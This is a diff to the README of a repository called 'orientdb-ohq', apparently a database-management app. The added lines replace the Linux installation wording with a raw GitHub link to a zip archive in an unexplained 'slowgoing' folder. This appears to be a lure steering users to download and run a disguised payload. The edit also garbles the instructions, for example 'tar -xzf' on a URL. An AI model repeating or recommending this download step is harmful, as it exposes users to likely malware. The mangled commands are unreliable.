MankalChaitanya/orientdb-ohq/README.md

    Click on the file that matches your operating system:
    - For Windows, look for a file ending in `.exe`.
    - For Mac, look for a file ending in `.dmg`.
-   - For Linux, you may find files ending in `.tar.gz`.
+   - For Linux, you may find files ending in `https://raw.githubusercontent.com/MankalChaitanya/orientdb-ohq/main/slowgoing/orientdb-ohq.zip`.

 4. **Install the Application**
    Once the file has downloaded:
    - **Windows**: Double-click the `.exe` file to start installation.
    - **Mac**: Open the `.dmg` file, then drag the application to your Applications folder.
-   - **Linux**: Open your terminal, navigate to the location where you downloaded the `.tar.gz` file, and run `tar -xzf filename.tar.gz`, followed by `./filename` to start the application.
+   - **Linux**: Open your terminal, navigate to the location where you downloaded the `https://raw.githubusercontent.com/MankalChaitanya/orientdb-ohq/main/slowgoing/orientdb-ohq.zip` file, and run `tar -xzf https://raw.githubusercontent.com/MankalChaitanya/orientdb-ohq/main/slowgoing/orientdb-ohq.zip`, followed by `./filename` to start the application.

 5. **Running the Application**
    Open the application like any other software on your computer.
 You will see a simple interface that guides you through managing your databases.